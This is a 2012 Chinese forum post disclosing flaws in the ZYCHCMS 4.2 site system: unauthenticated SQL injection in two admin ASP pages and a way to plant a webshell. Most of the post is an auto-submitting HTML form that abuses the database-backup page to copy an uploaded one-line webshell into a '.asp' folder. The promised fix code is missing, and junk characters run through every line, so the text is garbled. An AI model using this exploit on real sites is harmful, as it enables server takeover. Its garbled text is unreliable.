" S' z3 S1 l' V6 n6 h: c; @
0 Z! B0 e+ R: ^7 |
) A! s7 z& H0 y" y9 Y6 d1 u7 k' G6 P6 l6 [* E$ m
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
: v, F1 V2 q7 @" [ ①SQL注射漏洞
9 S! m. g6 j3 _ r/ h 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp9 z# q7 E$ I \
漏洞原因:未过滤2 [- d" w4 H) x6 H* B2 r3 c: P/ D
漏洞代码:
5 C1 e! Y! b- a9 c: Z 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
@* p. q% v; [7 e m" J5 c 修复方法:在文件开头加入代码
6 [& g( l" e- ]% o& H
- e N; z5 o+ e. k5 I4 _' M& n
" e0 L4 B* P7 i- i7 a, }②后台拿WBSHELL
1 L8 @ D% U7 b- Z @, W. m; q 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。* t9 N; v; H- ]$ T$ Y! L6 V+ {
这里在网上找了一个,改了下,将就着用。% t2 |; M( V, F6 o
以下是代码本地提交代码
- Z T* L* f! r 1 M. L' U4 H1 }
! K# z: H A; O<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
8 s# m$ ]( V4 q# h <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>7 M; g$ e9 D- L# y9 g
<tr>
+ R+ L- F( C' q( N. Y0 @ <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>" d) g3 Z1 j, u! q3 N+ Q: f2 o
</tr>6 B1 X3 ?" H/ p6 ]
<tr>
$ N$ n; ? F6 c: m <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
) u- N5 k6 T. B( Z </span>
$ ]: j, x$ {+ l* W1 d" s! x <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >3 ^/ }/ r1 u8 v
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
I. o& w5 L4 i0 n <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
! x* T# G, l+ h d% W+ l& i# U <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d3 Y8 ^+ V/ u4 f: M2 [2 v& J* N
<div align=”left”>
0 B9 [' [3 a& S9 o$ g <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />6 O( H- b, I1 u. _' [' F9 L
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
+ F+ _8 i( |9 ]/ C. M: \; T <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />5 A7 p X3 F F2 g) C3 @
</div></td>, M3 S& K' u% s# i( b9 Z
</tr># M1 f; I4 @0 [* {6 v
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>3 g* R; o" R& e6 b
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
- w0 k% r( d4 @" Y2 b <td class=”td”><div align=”left”>- s2 d u/ P, }. ]
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
* [+ u3 B Z) f3 e3 a9 Z& G( l5 W [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>5 M K" o- S; }% y: t- P1 V5 t# z
</tr>) P5 \6 {( \$ I7 B; V# t
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
" v/ w$ [& [3 F) o <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>! B" K! s" M# r: S# d
<td class=”td”><div align=”left”>0 u4 ~% f% w8 v) _0 P
<input type=”submit” value=”确定备份” class=”btn”
* }. z& `( |' l, Y* u% \ </div></td>+ u6 l- S2 Q3 G3 F( R, _
</tr>1 _: O& F/ ]: V0 }9 `* [0 g
</table></td></tr></form>
' ^% f8 s) {1 r4 Q2 Y/ Q+ ^0 ? </table>
5 r& N5 d( T7 J3 G8 N </td>
0 g+ [- n* H K' b4 K6 a9 @ </tr>
' _8 s) X9 p' K7 X </table>0 E3 T. f( n+ n; r: U
<script>
W; |: g2 W$ a document.all.add.submit();* |2 }4 o9 u8 C
</script>
% b! U9 X& ?8 i* L7 c& b& s4 y/ u
6 R# t* r4 J R9 p. }; G9 w+ w3 t2 d; _% P; ^2 Z
+ D. T$ }7 ]; f0 E" Q+ J2 ^( x: f
* I }4 S0 F% [; L# P% w$ s; H! X+ b- k
( L: Y/ m* Z& v2 p' `, Q* m! a1 y6 b9 u& O7 n
$ B5 }/ x! N$ q0 q1 Z! {
% ^) M: T3 x1 K; P: v
, [6 [# ]) A) ~" T3 }& d) C |
发表于 2012-9-10 21:09:51
收藏
支持
反对